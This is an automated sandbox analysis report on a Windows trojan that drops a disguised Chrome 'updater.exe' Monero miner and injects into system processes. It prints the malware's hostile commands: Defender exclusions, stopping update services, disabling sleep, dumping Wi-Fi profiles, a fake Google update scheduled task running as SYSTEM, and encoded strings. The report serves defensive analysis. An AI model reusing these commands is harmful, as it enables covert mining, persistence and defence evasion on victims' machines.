Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D40121CC NtQuerySystemInformation,StrCmpNIW,	0_2_00000125D40121CC
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4012A7C NtEnumerateValueKey,NtEnumerateValueKey,	0_2_00000125D4012A7C
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D40123F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	0_2_00000125D40123F0
Source: C:\Windows\System32\dialer.exe	Code function: 19_2_00007FF744DD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	19_2_00007FF744DD10C0
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88A2A7C NtEnumerateValueKey,NtEnumerateValueKey,	24_2_000001F6C88A2A7C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC9026F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	27_2_00000261AC9026F0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC9021CC NtQuerySystemInformation,StrCmpNIW,	27_2_00000261AC9021CC
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E402A7C NtEnumerateValueKey,NtEnumerateValueKey,	29_2_000002311E402A7C

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00000125D4012CDC: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,

0_2_00000125D4012CDC

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\jscseoeoqftm.tmp

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36CB030	0_2_00000125D36CB030
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36CF2F8	0_2_00000125D36CF2F8
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36D1658	0_2_00000125D36D1658
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36CB23C	0_2_00000125D36CB23C
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D36C20DC	0_2_00000125D36C20DC
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4012CDC	0_2_00000125D4012CDC
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401BE3C	0_2_00000125D401BE3C
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4022258	0_2_00000125D4022258
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401FEF8	0_2_00000125D401FEF8
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401BC30	0_2_00000125D401BC30
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A53DCD8	0_2_00007FF95A53DCD8
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A53AF46	0_2_00007FF95A53AF46
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A53BCF2	0_2_00007FF95A53BCF2
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A54F9F0	0_2_00007FF95A54F9F0
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF95A53127D	0_2_00007FF95A53127D
Source: C:\Windows\System32\dialer.exe	Code function: 19_2_00007FF744DD14E4	19_2_00007FF744DD14E4
Source: C:\Windows\System32\dialer.exe	Code function: 19_2_00007FF744DD2328	19_2_00007FF744DD2328
Source: C:\Windows\System32\dialer.exe	Code function: 19_2_00007FF744DD1DB4	19_2_00007FF744DD1DB4
Source: C:\Windows\System32\dialer.exe	Code function: 19_2_00007FF744DD26E8	19_2_00007FF744DD26E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF95A5351E8	21_2_00007FF95A5351E8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C847B030	24_2_000001F6C847B030
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C84720DC	24_2_000001F6C84720DC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C847B23C	24_2_000001F6C847B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C8481658	24_2_000001F6C8481658
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C847F2F8	24_2_000001F6C847F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88ABC30	24_2_000001F6C88ABC30
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88A2CDC	24_2_000001F6C88A2CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88AFEF8	24_2_000001F6C88AFEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88ABE3C	24_2_000001F6C88ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88B2258	24_2_000001F6C88B2258
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88DB030	24_2_000001F6C88DB030
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88D20DC	24_2_000001F6C88D20DC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88DF2F8	24_2_000001F6C88DF2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88DB23C	24_2_000001F6C88DB23C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88E1658	24_2_000001F6C88E1658
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890BC30	24_2_000001F6C890BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C8902CDC	24_2_000001F6C8902CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890FEF8	24_2_000001F6C890FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890BE3C	24_2_000001F6C890BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C8912258	24_2_000001F6C8912258
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8DF2F8	27_2_00000261AC8DF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8E1658	27_2_00000261AC8E1658
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8DB030	27_2_00000261AC8DB030
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8D20DC	27_2_00000261AC8D20DC
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC8DB23C	27_2_00000261AC8DB23C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90FEF8	27_2_00000261AC90FEF8
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC912258	27_2_00000261AC912258
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90BC30	27_2_00000261AC90BC30
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC902CDC	27_2_00000261AC902CDC
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90BE3C	27_2_00000261AC90BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275EF2F8	28_2_000001F0275EF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275EB23C	28_2_000001F0275EB23C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275F1658	28_2_000001F0275F1658
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275EB030	28_2_000001F0275EB030
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F0275E20DC	28_2_000001F0275E20DC
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761FEF8	28_2_000001F02761FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F027622258	28_2_000001F027622258
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761BE3C	28_2_000001F02761BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761BC30	28_2_000001F02761BC30
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F027612CDC	28_2_000001F027612CDC
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3DB23C	29_2_000002311E3DB23C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3E1658	29_2_000002311E3E1658
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3DF2F8	29_2_000002311E3DF2F8
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3DB030	29_2_000002311E3DB030
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E3D20DC	29_2_000002311E3D20DC
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E412258	29_2_000002311E412258
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40BE3C	29_2_000002311E40BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40FEF8	29_2_000002311E40FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40BC30	29_2_000002311E40BC30
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E402CDC	29_2_000002311E402CDC
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E441658	29_2_000002311E441658
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E43B23C	29_2_000002311E43B23C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E43F2F8	29_2_000002311E43F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E43B030	29_2_000002311E43B030
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E4320DC	29_2_000002311E4320DC

Source: jscseoeoqftm.tmp.1.dr

Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: updater.exe.1.dr	Static PE information: Number of sections : 14 > 10
Source: zxcvbnmasd.exe.0.dr	Static PE information: Number of sections : 14 > 10

Source: zufmUwylvo.exe, 00000000.00000000.11491251455.00000125B8E04000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameSystem.exe" vs zufmUwylvo.exe

Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: zufmUwylvo.exe, DiybvPeeTbqiC.cs

Base64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@72/47@3/3

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

19_2_00007FF744DD2328

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00007FF95A54C3EC CreateToolhelp32Snapshot,

0_2_00007FF95A54C3EC

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

19_2_00007FF744DD1AC4

Source: C:\Windows\System32\dialer.exe

19_2_00007FF744DD2328

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zufmUwylvo.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8548:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8980:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8896:120:WilError_03

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

Jump to behavior

Source: zufmUwylvo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zufmUwylvo.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zufmUwylvo.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\zufmUwylvo.exe "C:\Users\user\Desktop\zufmUwylvo.exe"
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
